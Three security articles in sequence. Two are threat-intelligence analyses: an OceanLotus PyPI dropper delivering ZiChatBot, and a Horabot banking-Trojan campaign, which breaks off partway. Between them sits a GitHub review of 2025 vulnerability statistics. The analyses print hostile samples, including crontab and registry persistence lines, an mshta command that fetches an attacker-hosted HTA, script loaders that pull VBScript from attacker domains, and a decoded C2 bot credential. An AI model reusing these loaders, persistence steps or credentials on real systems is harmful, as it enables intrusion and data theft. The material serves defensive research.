OceanLotus suspected of using PyPI to deliver ZiChatBot malware

Introduction

Through our daily threat hunting, we noticed that, beginning in July 2025, a series of malicious wheel packages were uploaded to PyPI (the Python Package Index). We shared this information with the public security community, and the malware was removed from the repository. We submitted the samples to Kaspersky Threat Attribution Engine (KTAE) for analysis. Based on the results, we believe the packages may be linked to malware discussed in a Threat Intelligence report on OceanLotus.

While these wheel packages do implement the features described on their PyPI web pages, their true purpose is to covertly deliver malicious files. These files can be either .DLL or .SO (Linux shared library), indicating the packages’ ability to target both Windows and Linux platforms. They function as droppers, delivering the final payload – a previously unknown malware family that we have named ZiChatBot. Unlike traditional malware, ZiChatBot does not communicate with a dedicated command and control (C2) server, but instead uses a series of REST APIs from the public team chat app Zulip as its C2 infrastructure.

To conceal the malicious package containing ZiChatBot, the attacker created another benign-looking package that included the malicious package as a dependency. Based on these facts, we confirm that this campaign is a carefully planned and executed PyPI supply chain attack.

Technical details

Spreading

The attacker created three projects on PyPI and uploaded malicious wheel packages designed to imitate popular libraries, tricking users into downloading them. This is a clear example of a supply chain attack via PyPI. See below for detailed information about the fake libraries and their corresponding wheel packages.

Malicious wheel packages

The packages added by the attacker and listed on PyPI’s download pages are:

  • uuid32-utils library for generating a 32-character random string as a UUID
  • colorinal library for implementing cross-platform color terminal text
  • termncolor library for ANSI color format for terminal output

The key metadata for these packages are as follows:

Pip install command	File name	First upload date	Author / Email
pip install uuid32-utils	uuid32_utils-1.x.x-py3-none-[OS platform].whl	2025-07-16	laz**** / laz****@tutamail.com
pip install colorinal	colorinal-0.1.7-py3-none-[OS platform].whl	2025-07-22	sym**** / sym****@proton.me
pip install termncolor	termncolor-3.1.0-py3-none-any.whl	2025-07-22	sym**** / sym****@proton.me

Based on the distribution information on the PyPI web page, the packages are offered in x86 and x64 builds for Windows, as well as an x86_64 build for Linux. The colorinal project, for example, provides the following download options:

Distribution information of the colorinal project

Initial infection

The uuid32-utils and colorinal libraries employ similar infection chains and malicious payloads. As a result, this analysis will focus on the colorinal library as a representative example.

A quick look at the code of the third library, termncolor, reveals no apparent malicious content. However, it imports the malicious colorinal library as a dependency. This technique lets attackers conceal the malware more deeply, making the termncolor library appear harmless when it is distributed or used to lure targets.

The termncolor library imports the malicious colorinal library

During the initial infection stage, the Python code is nearly identical across both Windows and Linux platforms. Here, we analyze the Windows version as an example.

Windows version

Once a Python user downloads and installs the colorinal-0.1.7-py3-none-win_amd64.whl wheel package file, or installs it using the pip tool, the ZiChatBot’s dropper (a file named terminate.dll) will be extracted from the wheel package and placed on the victim’s hard drive.

After that, if the colorinal library is imported into the victim’s project, the Python script file at [Python library installation path]\colorinal-0.1.7-py3-none-win_amd64\colorinal\__init__.py will be executed first.

The __init__.py script imports the malicious file unicode.py

This Python script imports and executes another script located at [python library install path]\colorinal-0.1.7-py3-none-win_amd64\colorinal\unicode.py. The is_color_supported() function in unicode.py is called immediately.

The code loads the dropper into the host Python process

The comment in the is_color_supported() function claims that the highlighted code checks whether the user’s terminal environment supports color. In reality, the code loads the terminate.dll file into the Python process and then invokes the DLL’s exported function envir, passing the UTF-8-encoded string xterminalunicode as a parameter. The DLL acts as a dropper, delivering the final payload, ZiChatBot, and then self-deleting. At the end of the is_color_supported() function, the unicode.py script file is also removed. These steps eliminate all malicious files in the library and deploy ZiChatBot.
For the Linux platform, the wheel package and the unicode.py Python script are nearly identical to the Windows version. The only difference is that the dropper file is named “terminate.so”.

Dropper for ZiChatBot

From the previous analysis, we learned that the dropper is loaded into the host Python process by a Python script and then activated. The main logic of the dropper is implemented in the envir export function to achieve three objectives:

  1. Deploy ZiChatBot.
  2. Establish an auto-run mechanism.
  3. Execute shellcode to remove the dropper file (terminate.dll) and the malicious script file from the installed library folder.

The dropper first decrypts sensitive strings using AES in CBC mode. The key is the string-type parameter “xterminalunicode” of the exported function. The decrypted strings are “libcef.dll”, “vcpacket”, “pkt-update”, and “vcpktsvr.exe”.

Next, the malware uses the same algorithm to decrypt the embedded data related to ZiChatBot. It then decompresses the decrypted data with LZMA to retrieve the files vcpktsvr.exe and libcef.dll associated with ZiChatBot. The malware creates a folder named vcpacket in the system directory %LOCALAPPDATA%, and places these files into it.
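
Under these assumptions, the unpacking stage can be sketched in Python. The AES-CBC step is omitted (it requires a third-party crypto library), and the single output file name payload.bin is our placeholder; the real dropper writes vcpktsvr.exe and libcef.dll:

```python
import lzma
from pathlib import Path


def drop_payload(decrypted_blob: bytes, local_appdata: str) -> Path:
    """Sketch of the dropper's unpacking step.

    Assumes the AES-CBC decryption (key "xterminalunicode") has already
    happened; the payload is then LZMA-compressed. Writing a single
    payload.bin is our simplification: the real dropper extracts
    vcpktsvr.exe and libcef.dll.
    """
    target = Path(local_appdata) / "vcpacket"
    target.mkdir(parents=True, exist_ok=True)
    raw = lzma.decompress(decrypted_blob)  # LZMA stage of payload recovery
    out = target / "payload.bin"
    out.write_bytes(raw)
    return out
```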

To establish persistence for ZiChatBot, the dropper creates the following auto-run entry in the registry:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"pkt-update"="C:\Users\[User name]\AppData\Local\vcpacket\vcpktsvr.exe"

Once preparations are complete, the malware uses the XOR algorithm to decrypt the embedded shellcode with the three-byte key “3a7”. It then searches the decrypted shellcode in memory for the string Policy.dllcppage.dll, replaces it with the dropper’s own file name, terminate.dll, and redirects execution to the shellcode’s memory space.
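
A minimal Python sketch of these two steps, assuming the key is the literal ASCII bytes "3a7" applied cyclically and that the shorter replacement name is NUL-padded to preserve the shellcode layout (both are our reading of the description above):

```python
def xor_crypt(data: bytes, key: bytes = b"3a7") -> bytes:
    # Repeating-key XOR: applying the same routine twice restores the input
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def patch_dropper_name(shellcode: bytes,
                       placeholder: bytes = b"Policy.dllcppage.dll",
                       name: bytes = b"terminate.dll") -> bytes:
    # Overwrite the placeholder with the dropper's own file name,
    # NUL-padding so offsets inside the shellcode do not shift
    return shellcode.replace(placeholder, name.ljust(len(placeholder), b"\x00"))
```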

The shellcode employs a djb2-like hash method to calculate the names of certain APIs and locate their addresses. Using these APIs, it locates the dropper file (terminate.dll), whose name was patched in by the DLL earlier, then unloads the DLL from the process and deletes the file.
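
For reference, the textbook djb2 hash over an API name looks like this (the sample uses a djb2-like variant, so its exact constants may differ):

```python
def djb2(name: bytes) -> int:
    # Classic djb2: h = h * 33 + c, truncated to 32 bits
    h = 5381
    for c in name:
        h = (h * 33 + c) & 0xFFFFFFFF
    return h

# Shellcode using this trick walks a module's export table, hashes each
# exported name, and compares against a precomputed constant, so the API
# name never appears in the shellcode in clear text.
```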

Linux version

The Linux version of the dropper places ZiChatBot in the path /tmp/obsHub/obs-check-update and then creates an auto-run job using crontab. Unlike the Windows version, the Linux version of ZiChatBot only consists of one ELF executable file.

system("chmod +x /tmp/obsHub/obs-check-update")
system("echo \"5 * * * * /tmp/obsHub/obs-check-update\" | crontab -")

ZiChatBot

The Windows version of ZiChatBot is a DLL file (libcef.dll) that is loaded by the legitimate executable vcpktsvr.exe (hash: 48be833b0b0ca1ad3cf99c66dc89c3f4). The DLL contains several export functions, with the malicious code implemented in the cef_api_mash export. Once the DLL is loaded, this function is invoked by the EXE file. ZiChatBot uses the REST APIs from Zulip, a public team chat application, as its command and control server.

ZiChatBot is capable of executing shellcode received from the server and only supports this one control command. Once it runs, it initiates a series of sequential HTTP requests to the Zulip REST API.

In each HTTP request, an API authentication token is included as an HTTP header for server-side authentication, as shown below.

// Auth token:
TW9yaWFuLWJvdEBoZWxwZXIuenVsaXBjaGF0LmNvbTpVOFJFWGxJNktmOHFYQjlyUXpPUEJpSUE0YnJKNThxRw==

// Decoded Auth token
Morian-bot@helper.zulipchat.com:U8REXlI6Kf8qXB9rQzOPBiIA4brJ58qG

ZiChatBot utilizes two separate channel-topic pairs for its operations. One pair transmits current system information, and the other retrieves a message containing shellcode. Once the shellcode is received, a new thread is created to execute it. After executing the command, a heart emoji is sent in response to the original message to indicate the execution was successful.
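
As an illustration of this C2 scheme, the sketch below builds (without sending) a request to Zulip's public add-reaction endpoint, authenticated the same way as the token shown earlier; the site, bot address, API key, and message ID are placeholders:

```python
import base64
import urllib.parse
import urllib.request


def zulip_auth(email: str, api_key: str) -> str:
    # Zulip's REST API uses HTTP Basic auth over "email:api_key"
    token = base64.b64encode(f"{email}:{api_key}".encode()).decode()
    return f"Basic {token}"


def build_heart_reaction(site: str, message_id: int,
                         email: str, api_key: str) -> urllib.request.Request:
    # POST /api/v1/messages/{id}/reactions with emoji_name=heart, mirroring
    # the acknowledgement ZiChatBot sends after executing shellcode
    body = urllib.parse.urlencode({"emoji_name": "heart"}).encode()
    req = urllib.request.Request(
        f"{site}/api/v1/messages/{message_id}/reactions",
        data=body, method="POST")
    req.add_header("Authorization", zulip_auth(email, api_key))
    return req
```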

Infrastructure

We did not find any traditional infrastructure, such as compromised servers or commercial VPS services and their associated IPs and domains. Instead, the malicious wheel packages were uploaded to the Python Package Index (PyPI), a public, shared Python library. The malware, ZiChatBot, leverages Zulip’s public team chat REST APIs as its command and control server.

The “helper” organization that the attacker had registered on the Zulip service has since been deactivated by Zulip. However, infected devices may still attempt to connect to the service, so to help you locate and remediate them, we recommend adding the domain helper.zulipchat.com to your denylist.

Victims

The malware was uploaded in July 2025. Upon discovering these attacks, we quickly released an update for our product to detect the relevant files and shared the necessary information with the public security community. As a result, the malicious software was swiftly removed from PyPI, and the organization registered on the Zulip service was officially deactivated. To date, we have not observed any infections based on our telemetry or public reports.

Zulip has officially deactivated the “helper” organization

Attribution

Based on the results from our KTAE system, the dropper used by ZiChatBot shows a 64% similarity to another dropper we analyzed in a TI report, which was linked to OceanLotus. Reverse engineering shows that both droppers use nearly identical algorithms and logic to decrypt and decompress their embedded payloads.

Analysis results of dropper using KTAE system

Conclusions

As an active APT organization, OceanLotus primarily targets victims in the Asia-Pacific region. However, our previous reports have highlighted a growing trend of the group expanding its activities into the Middle East. Moreover, the attacks described in this report – executed through PyPI – target Python users worldwide. This demonstrates OceanLotus’s ongoing effort to broaden its attack scope.

In the first half of 2025, a public report revealed that the group launched a phishing campaign using GitHub. The recent PyPI-based supply chain attack likely continues this strategy. Although phishing emails are still a common initial infection method for OceanLotus, the group is also actively exploring new ways to compromise victims through diverse supply chain attacks.

Indicators of compromise

Additional information about this activity, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact intelreports@kaspersky.com.

Malicious wheel packages
termncolor-3.1.0-py3-none-any.whl
5152410aeef667ffaf42d40746af4d84

uuid32_utils-1.x.x-py3-none-xxxx.whl
0a5a06fa2e74a57fd5ed8e85f04a483a
e4a0ad38fd18a0e11199d1c52751908b
5598baa59c716590d8841c6312d8349e
968782b4feb4236858e3253f77ecf4b0
b55b6e364be44f27e3fecdce5ad69eca
02f4701559fc40067e69bb426776a54f
e200f2f6a2120286f9056743bc94a49d
22538214a3c917ff3b13a9e2035ca521

colorinal-0.1.7-py3-none-xxxx.whl
ba2f1868f2af9e191ebf47a5fab5cbab

Dropper for ZiChatBot
Backward.dll
c33782c94c29dd268a42cbe03542bca5
454b85dc32dc8023cd2be04e4501f16a

Backward.so
fce65c540d8186d9506e2f84c38a57c4
652f4da6c467838957de19eed40d39da

terminate.dll
1995682d600e329b7833003a01609252

terminate.so
38b75af6cbdb60127decd59140d10640

ZiChatBot
libcef.dll
a26019b68ef060e593b8651262cbd0f6

A year of open source vulnerability trends: CVEs, advisories, and malware

GitHub published 4,101 reviewed advisories in 2025, the fewest reviewed advisories since 2021. Does this mean open source is shipping more secure code? Let’s dig into the data to find out.

GitHub reviewed advisories

Fewer advisories reviewed doesn’t mean fewer vulnerabilities were reported. The drop is because GitHub reviewed far fewer older vulnerabilities. When you look only at newly reported vulnerabilities from our sources, GitHub actually reviewed 19% more advisories year over year.

Stacked bar graph showing the number of advisories published from GitHub's feeds and those published from the backfill campaigns.

Reviewed Year	From Feeds	From Backfill
2020	1145	1539
2021	1419	1412
2022	2731	1848
2023	3065	1792
2024	3142	2093
2025	3734	367
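
The 19% figure can be checked directly against the From Feeds column:

```python
# "From Feeds" advisories reviewed per year, taken from the table above
from_feeds = {2024: 3142, 2025: 3734}

growth = (from_feeds[2025] - from_feeds[2024]) / from_feeds[2024]
print(f"{growth:.1%}")  # ~18.8%, i.e. the 19% year-over-year increase cited
```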

So why the change? Quite frankly, we are running out of unreviewed vulnerabilities that are older than the Advisory Database. At the same time, the number of newly reported vulnerabilities hasn’t dropped.

It’s also worth clarifying that “unreviewed” in the database can be misleading: most advisories marked unreviewed have already been looked at by a curator and found not to affect any package in a supported ecosystem, so they may never be fully reviewed.

Stacked line graph showing the cumulative number of advisories of each type over the years.

Year	Unreviewed	Reviewed	Malware	Withdrawn
2019	0	381	0	42
2020	0	3,065	0	101
2021	1,978	5,896	0	140
2022	177,369	10,475	7,433	195
2023	202,583	15,332	9,136	290
2024	238,642	20,567	13,404	413
2025	283,447	24,668	20,649	522

This means that you should be receiving fewer brand-new Dependabot alerts about old vulnerabilities. 

Note: If you find an unreviewed advisory that affects a supported package, please let us know so we can get it reviewed!

How vulnerabilities were distributed across ecosystems in 2025

The distribution of ecosystems in advisories reviewed in 2025 is similar to the overall distribution in the database, with the exception of Go. Go is overrepresented in 2025 advisories by 6%. This is largely due to dedicated campaigns to re-examine potentially missing advisories found through an internal review for packages where we had inconsistent coverage.

Circle graph showing the distributions of ecosystems of advisories reviewed in 2025.

Ecosystem	Proportion of 2025 Reviewed Advisories
Composer	19.40%
Erlang	0.22%
GitHub Actions	0.41%
Go	17.33%
Maven	22.24%
npm	14.92%
Nuget	2.33%
Pip	17.16%
RubyGems	1.47%
Rust	4.31%
Swift	0.22%

Circle graph showing the distributions of ecosystems of reviewed advisories across the entire GitHub Advisory Database.

Ecosystem	Proportion of All Reviewed Advisories
Composer	20.16%
Erlang	0.16%
GitHub Actions	0.15%
Go	10.91%
Maven	24.33%
npm	17.05%
Nuget	2.98%
Pip	16.33%
Pub	0.04%
RubyGems	3.60%
Rust	4.13%
Swift	0.17%

How the types of vulnerabilities changed in 2025

Rank	Common Weakness Enumeration (CWE)	Number of 2025 Advisories*	Change in Rank from 2024	Change in Rank from the Overall Database
1	CWE-79	672	+0	+0
2	CWE-22	214	+2	+1
3	CWE-863	169	+9	+8
4	CWE-20	154	+1	+1
5	CWE-200	145	-2	-1
6	CWE-400	144	+4	+0
7	CWE-770	136	+7	+10
8	CWE-502	134	+5	+1
9	CWE-94	119	-3	-1
10	CWE-918	103	+5	+8

* An advisory may have more than one CWE. For example, an advisory might have both CWE-400 and CWE-770. It would then count for both.

As usual, cross-site scripting (CWE-79) is by far the most common vulnerability type. However, there are significant changes in the following areas. Resource exhaustion (CWE-400 and CWE-770), unsafe deserialization (CWE-502), and server-side request forgery (CWE-918) were unusually common in 2025. CWE-863 (“Incorrect Authorization”) saw a significant jump, but that is largely due to reclassification away from CWE-284 (“Improper Access Control”) and CWE-285 (“Improper Authorization”), which are higher level CWEs that the CWE program discourages using.

One of the biggest quality improvements in 2025 was more specific, more consistent CWE tagging. Advisories without any CWE dropped 85% (from 452 in 2024 to 65 in 2025). CWE-20 (“Improper Input Validation”) is still common, but in prior years it was often the only CWE listed on an advisory. 

In 2025, advisories far more often list CWE-20 plus one or more additional CWEs that describe the concrete failure mode. This added specificity makes the data more actionable for triage, prioritization, and remediation.

To find out how to filter Dependabot alerts by CWE, see our documentation on auto-triage rules.

How to prioritize your response

We provide two scoring systems for prioritization:

  • CVSS (Common Vulnerability Scoring System), which estimates the severity of the impact
  • EPSS (Exploit Prediction Scoring System), which estimates the likelihood of exploitation

Together, they can give you a head start on your risk assessment process.

Priority	CVSS	EPSS
Critical	392	11
High	1237	96
Moderate	1994	221
Low	475	1517
Very Low		1872

As you can see, when considering impact, most vulnerabilities skew toward the moderate-to-high end of the impact range. Low-impact vulnerabilities are likely more common than the CVSS data suggests, but are often not considered worth the time and effort for researchers and maintainers to report. The EPSS scores for moderate- to high-impact vulnerabilities support this interpretation.

Priority	CVSS	EPSS
Critical	8	4
High	8	11
Moderate	2	3
Low	0	0
Very Low	0	0

So should you trust the EPSS or CVSS scores? To judge that, let’s look at how they match up to vulnerabilities in CISA’s Known Exploited Vulnerabilities Catalog. The exploited vulnerabilities are at least scored moderate, and most are critical or high. While CVSS has more of the exploited vulnerabilities as critical, it also has far more vulnerabilities in the range in general. Combining the two can help you prioritize which vulnerabilities to address to prevent exploitation.
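
One simple way to combine the two signals is to escalate on either high impact or high exploitation likelihood; the thresholds below are illustrative, not GitHub's:

```python
def triage(cvss: float, epss: float) -> str:
    # Escalate on likely exploitation (EPSS is a 0-1 probability) or
    # critical impact; otherwise fall back to impact alone
    if epss >= 0.1 or cvss >= 9.0:
        return "urgent"
    if cvss >= 7.0:
        return "soon"
    return "scheduled"
```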

npm malware advisories

2025 was a huge year for npm malware advisories. Driven by large malware campaigns such as Shai-Hulud, GitHub saw a 69% increase in published malware advisories compared to 2024. This is the most malware advisories GitHub has published since the initial backfill of historical malware advisories when support was added in 2022.

You can receive Dependabot alerts when your repositories depend on npm packages with known malicious versions. When you enable malware alerting, Dependabot matches your npm dependencies against malware advisories in the GitHub Advisory Database.

Bar graph showing the number of published malware advisories each year.

Publication Year	Published Malware Advisories
2022	7433
2023	1703
2024	4268
2025	7197

GitHub CVE Numbering Authority (CNA)

CVE publications

2025 was a big year for the GitHub, Inc. CNA. We saw a 35% increase in published CVE records, outpacing the overall CVE Project’s increase of 21%.

Bar graph showing the number of CVEs GitHub published each year.

Published Year	CVEs Published
2020	509
2021	1047
2022	1297
2023	1784
2024	2152
2025	2903

In fact, we saw 10 to 16% growth every quarter. If this trend continues, GitHub will publish over 50% more CVEs in 2026.

Bar graph showing the number of CVEs published by GitHub each quarter in 2025.

2025 Published Quarter	Number of CVEs
Q1	598
Q2	660
Q3	762
Q4	883
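
Compounding the observed quarterly growth forward illustrates that projection (assuming roughly 13% per quarter, the midpoint of the observed range):

```python
# Q4 2025 count from the table above, grown ~13% per quarter through 2026
q = 883
total_2026 = 0
for _ in range(4):
    q = round(q * 1.13)
    total_2026 += q

print(total_2026)  # roughly 4,800 CVEs, well over 50% above 2025's 2,903
```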

You can help make that a reality by requesting a CVE from us the next time you publish a repository security advisory about a vulnerability!

Organizations using GitHub’s CNA

Every year, GitHub sees more organizations use its CNA services. 2025 was no exception, with a 20% increase in new organizations requesting CVE IDs.

Bar graph showing the number of new organizations using GitHub for CVEs for each year.

First CVE Year	New Organizations Using GitHub for CVEs
2020	231
2021	303
2022	328
2023	444
2024	568
2025	679

Unlike reviewed global advisories, which are always mapped to packages in ecosystems we support, any maintainer on GitHub can request a CVE, even if they don’t publish that package to a supported ecosystem. In fact, 2025 is the first year that GitHub has published more CVEs from organizations that do not use a supported ecosystem than those that do.

Stacked bar graph showing the number of CVEs GitHub published for vulnerabilities affecting supported packages vs those that don’t.

Published Year	Does Not Affect an Advisory DB Supported Ecosystem	Affects Advisory DB Supported Ecosystem
2020	203	306
2021	382	665
2022	491	806
2023	827	957
2024	961	1191
2025	1480	1423

We would like to thank all 987 organizations that published CVEs with us in 2025 and highlight the top 10 most prolific organizations.

Top 10 organizations using the GitHub CNA
Organization	Number of 2025 CVEs
LabReDeS (WeGIA)*	130
XWiki	40
Frappe	28
Discourse	27
Enalean	27
FreeScout*	27
DataEase	26
Nextcloud	25
GLPI	24
DNN Software*	23

* Organizations that published CVEs through GitHub for the first time in 2025

Onward to 2026

The data from 2025 shows incredible growth: 

  • 4,101 reviewed advisories 
  • 7,197 malware advisories 
  • 2,903 CVEs published
  • 679 new organizations using our CNA services

These numbers represent real security improvements for millions of developers.

You can be part of this in 2026. Here’s how: 

1. Use our CNA services

Publishing CVEs shouldn’t be complicated. Request a CVE directly from your repository security advisory, and we’ll take care of curating and publishing it for you. It’s free, it’s fast, and it helps the entire ecosystem understand and respond to vulnerabilities.

2. Improve advisory accuracy

Found an unreviewed advisory affecting a supported package? See incorrect severity scores or missing affected versions? Suggest edits. Your edits will be reviewed by the Advisory Database team and ultimately, will help make the database more accurate for everyone. In 2025, 675 contributions from the community improved the quality of this data for the entire software industry!

3. Protect your projects

The most direct impact you can have is protecting your own code. Enable Dependabot to automatically receive security updates and explore GitHub Advanced Security for comprehensive protection.

4. Make reporting a vulnerability easier

Let researchers know how to report to you and what you will and will not accept by creating a security policy for your repository. Enable private vulnerability reporting to make the coordination process smooth and secure.

Let’s make 2026 even better. See you in next year’s review! 🚀

The post A year of open source vulnerability trends: CVEs, advisories, and malware appeared first on The GitHub Blog.

The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico

Introduction

In this installment of our SOC Files series, we will walk you through a targeted campaign that our MDR team identified and hunted down a few months ago. It involves a threat known as Horabot, a bundle consisting of an infamous banking Trojan, an email spreader, and a notably complex attack chain.

Although previous research has documented Horabot campaigns (here and here), our goal is to highlight how active this threat remains and to share some aspects not covered in those analyses.

The starting point

As usual, our story begins with an alert that popped up in one of our customers’ environments. The rule that triggered it is generic yet effective at detecting suspicious mshta activity. The case progressed from that initial alert, but fortunately ended on a positive note. Kaspersky Endpoint Security intervened, terminated the malicious process (via a proactive defense module (PDM)) and removed the related files before the threat could progress any further.

The incident was then brought up for discussion at one of our weekly meetings. That was enough to spark the curiosity of one of our analysts, who then delved deeper into the tradecraft behind this campaign.

The attack chain

After some research and a lot of poking around in the adversary infrastructure, our team managed to map out the end-to-end kill chain. In this section, we will break down each stage and explain how the operation unfolds.

Stage 1: Initial lure

Following the breadcrumbs observed in the reported incident, the activity appears to begin with a standard fake CAPTCHA page. In the incident mentioned above, this page was located at the URL https://evs.grupotuis[.]buzz/0capcha17/ (details about its content can be found here).

Fake CAPTCHA page at the URL https://evs.grupotuis[.]buzz/0capcha17/

Similar to the Lumma and Amadey cases, this page instructs the user to open the Run dialog, paste a malicious command into it and then run it. Once deceived, the victim pastes a command similar to the one below:

mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

This command retrieved and executed an HTA file.

It is essentially a small loader. When executed, it opens a blank window, then immediately pulls and runs an external JavaScript payload hosted on the attacker’s domain. The body contains a large block of random, meaningless text that serves purely as filler.

Stage 2: A pinch of server-side polymorphism

The payload loaded by the HTA file dynamically creates a new <script> element, sets its source to an external VBScript hosted on another attacker-controlled domain, and injects it into the <head> section of a page hardcoded in the HTA. You can see the full content of the page in the box below. Once appended, the external VBScript is immediately fetched and executed, advancing the attack to its next stage.

var scriptEle = document.createElement("script");
scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/ld1/"); 
scriptEle.setAttribute("type", "text/vbscript"); 
document.getElementsByTagName('head')[0].appendChild(scriptEle);

In the next-stage VBS content, we observed the use of server-side polymorphism: each request for the same resource returned a slightly different version of the code while preserving the same functionality.

The script is obfuscated and employs a custom string encoding routine. We produced a more readable version with its strings decoded and replaced, using a small Python script that replicates the decode_str() routine.

The script performs pretty much the same function as the initial HTA file. It reaches a JavaScript loader that injects and executes another polymorphic VBScript.

var scriptEle = document.createElement("script");
scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/"); 
scriptEle.setAttribute("type", "text/vbscript"); 
document.getElementsByTagName('head')[0].appendChild(scriptEle);

Unlike the first script, this one is significantly more complex, with more than 400 lines of code. It acts as the heavy lifter of the operation. Below is a brief summary of its key characteristics:

  • Heavy obfuscation: the script uses multiple layers of obfuscation to obscure its behavior.
  • Custom string decoder: employs the same decoding routine found in the first VBScript to reconstruct strings at runtime.
  • Anti-VM and “anti-Avast”: performs basic environment checks and terminates if a specific Avast folder or VM artifacts are detected.
  • Information gathering and exfiltration: collects the host IP, hostname, username, and OS version, then sends this data to a C2 server.
  • Download of additional components: retrieves an AutoIt executable, its compiler (Aut2Exe), a script (au3), and a blob file, placing them under the hardcoded path C:\Users\Public\LAPTOP-0QF0NEUP4.
  • PowerShell command execution: executes PowerShell commands that reach out to two different URLs (one unavailable and the other leading to the first stager of the spreader, which we describe later in this article).
  • Persistence setup: creates a LNK file and drops it into the Startup folder to maintain persistence.
  • Cleanup routines: removes temporary files and terminates selected processes.

During our analysis of the heavy lifter, specifically within the exfiltration routine, we identified where the collected data was being sent. After probing the associated URL and removing the “salvar.php” portion, we uncovered an exposed webpage where the adversary listed all their victims.

The victim table is in Brazilian Portuguese and lists victims dating back to May 2025 (our screenshot was taken in September 2025). In the “Localização” (location) column, the adversary even included the victims’ geographic coordinates, which are redacted in the screenshot. A quick breakdown shows that, of the 5384 victims, 5030 were located in Mexico, representing roughly 93% of the total.

Stage 3: The evil combination of AutoIT and a banking Trojan

It is now time to focus on the files downloaded by our heavy lifter. As previously mentioned, three AutoIT components were dropped on disk: the executable (AutoIT3), the compiler (Aut2Exe), and the script (au3), along with an encrypted blob file. Since we have access to the AutoIt script code, we can analyze its routines. However, it contains over 750 lines of heavily obfuscated code, so let’s focus only on what really matters.

The most important routine is responsible for decrypting the blob file (it uses AES-192 with a key derived from the seed value 99521487), loading it directly into memory, and then calling the exported function B080723_N. The decrypted blob is a DLL.

We also managed to replicate the decryption logic with a Python script and manually extract the DLL (0x6272EF6AC1DE8FB4BDD4A760BE7BA5ED). After initial triage and basic sandbox execution, we observed the following:

  • The sample is a well-known Delphi banking Trojan detected by several engines under different names, such as Casbaneiro, Ponteiro, Metamorfo, and Zusy.
  • It embeds two old OpenSSL libraries (libeay32.dll and ssleay32.dll) from the Indy Project, an open-source client/server communications library, which it uses to establish HTTPS C2 communication.
  • It includes SQL commands used to harvest credentials from browsers.

Once loaded into memory, the Trojan sends several HTTP requests to different URLs:

URL	Description
https://cgf.facturastbs[.]shop/0725/a/home (GET)	A page containing an encrypted configuration
https://cfg.brasilinst[.]site/a/br/logs/index.php?CHLG (POST)	A URL for posting host information; in our lab tests the value was empty. Request content example: Host: ‘ ‘
https://aufal.filevexcasv[.]buzz/on7/index15.php (POST)
https://aufal.filevexcasv[.]buzz/on7all/index15.php (POST)	A URL used to post victim information. Request content example: AT: ‘ Microsoft Windows 10 Pro FLARE-VM (64)bit REMFLARE-VM’, MD: 040825VS
https://cgf.facturastbs[.]shop/a/08/150822/au/at.html	HTML lure page designed to trick the user into accessing a malicious link; its contents are also used as a PDF attachment during the email distribution phase.
https://upstar.pics/a/08/150822/up/up (GET)	The resource was already unavailable at the time our testing was conducted.
https://cgf.midasx.site/a/08/150822/au/au (GET)	The page containing the first stage leading to the spreader.

Since this malware family has been extensively documented in previous studies, we won’t reiterate its well-known functionality. Instead, we’ll focus on lesser-documented and newly observed features, including the malware’s encryption and protocol handling logic.

The sample implements a stateful XOR-subtraction cipher in the sub_00A86B64 subroutine, which is used to protect strings and decrypt HTTP data received from the C2. Unlike simple XOR, each byte of output here depends on both the key and the previous byte. In our sample, the key is the string "0xFF0wx8066h".

Key construction (left) and decryption logic (right)

We can easily reimplement the logic of the routine in Python and integrate the following snippet into our workflow to automate string decryption:

def decrypt_string(encrypted_hex):
    key_string = "0xFF0wx8066h"  # hardcoded key observed in the sample
    key_index = 0
    result = ""

    # The first ciphertext byte only seeds the cipher state; it is never decrypted
    current_key = int(encrypted_hex[0:2], 16)

    i = 2
    while i < len(encrypted_hex):
        next_key = int(encrypted_hex[i:i+2], 16)

        # Cycle through the key string byte by byte
        if key_index >= len(key_string):
            key_index = 0
        key_char = ord(key_string[key_index])
        xored_value = next_key ^ key_char

        # Subtract the previous ciphertext byte, wrapping around via +0xFF
        if xored_value > current_key:
            decrypted_char = xored_value - current_key
        else:
            decrypted_char = (xored_value + 0xFF) - current_key

        result += chr(decrypted_char)
        current_key = next_key  # stateful: each byte depends on the previous ciphertext byte
        key_index += 1
        i += 2

    return result

Python implementation of the decryption routine

The encrypted strings are retrieved in three different ways: through indexed lookups into a global encrypted Delphi string list (also observed by our colleagues at ESET); via direct references to encrypted hex strings in the data section; and through indirect references using pointer variables, which adds overhead when automating decryption with scripts.

Direct pointer (left), indirect pointer (right)

Indexed strings via TStringList lookups

The malware fetches its configuration by performing an HTTPS GET request to the hardcoded, encrypted C2 server. The server responds with a configuration, which is a raw HTTP response, consisting of several values, each individually encrypted with the aforementioned algorithm. The sample extracts specific parameters based on their position in the list.

Decrypted configuration values (root password redacted)

To improve readability, the above screenshot has been edited to include the decrypted parameters, which are separated by double newlines.
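The positional extraction can be modeled with a short sketch. We assume one encrypted value per line in the raw response (the exact separator is our assumption), and `decrypt_fn` stands in for the string-decryption routine shown earlier:

```python
def parse_config(raw_response: str, decrypt_fn=lambda v: v):
    # One encrypted value per non-empty line (assumed wire format);
    # the malware addresses parameters by position, so index from 1
    values = [line for line in raw_response.splitlines() if line.strip()]
    return {idx: decrypt_fn(v) for idx, v in enumerate(values, start=1)}

# Parameter 1 holds the C2 socket setting in "host;port" form
config = parse_config("c2.example;4444\nparam2\nparam3")
host, port = config[1].split(";")
```

With the real decryption routine plugged in as `decrypt_fn`, the same loop recovers all configuration parameters in one pass.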

Configuration retrieval and parsing are initiated in the sub_00AD2C70 subroutine where the first configuration value, the C2 socket connection setting (host;port), is extracted.

C2 socket address extraction

If parsing fails, the malware falls back to a hardcoded secondary C2 socket address. The socket connection is then established.

Fallback to hardcoded socket address (lifenews[.]pro:49569)

Additional configuration values are parsed in sub_00AD2918 and its subroutines. For example, in the decrypted C2 configuration shown above, parameter 5 contains the “UPON” string that triggers execution, and parameter 6 contains the PowerShell commands that are run when this string is used. Below is the portion of the routine that takes care of parsing this command:
Extracting value 5 and 6 from the configuration

In addition to HTTP communication, the malware supports raw socket communication using a custom protocol that encapsulates commands into tags such as <|SIMPLE_TAG|> or <|TAG|>Arg1<|>Arg2<<|>.
